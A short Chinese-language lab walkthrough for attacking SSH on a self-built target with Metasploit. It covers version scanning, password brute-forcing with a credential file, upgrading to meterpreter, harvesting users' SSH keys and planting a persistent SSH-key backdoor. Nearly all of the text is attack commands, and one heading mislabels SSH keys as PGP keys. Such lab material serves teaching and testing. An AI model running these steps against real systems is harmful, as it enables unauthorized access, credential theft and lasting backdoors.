搭建靶机,利用msf进行SSH渗透
搭建环境
安装openssh
sudo apt-get install openssh-server
抓取SSH Banner
nmap:
nmap -sV 192.168.222.147
使用msf的db_nmap:
msf > db_status
msf > db_nmap -sV 192.168.222.147
使用msf的辅助模块查询版本号:
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147
msf auxiliary(ssh_version) > exploit
爆破
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147
msf auxiliary(ssh_login) > set USERPASS_FILE /root/Desktop/di.txt
USERPASS_FILE => /root/Desktop/di.txt
msf auxiliary(ssh_login) > exploit
msf auxiliary(ssh_login) > sessions 1
[*] Starting interaction with 1...
ifconfig
执行以下命令获得meterpreter 会话:
sessions -u 2
sessions -l
窃取PGP密钥登陆ssh
收集目标机器上所有用户的.ssh目录内容,下载known_hosts和authorized_key以及其他文件:
msf post(sshkey_persistence) > use post/multi/gather/ssh_creds
msf post(ssh_creds) > set sessions 2
sessions => 2
msf post(ssh_creds) > exploit
创建永久后门
给指定的用户添加ssh密钥,从而可通过ssh进行远程登陆
msf post(ssh_creds) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set sessions 2
sessions => 2
msf post(sshkey_persistence) > exploit
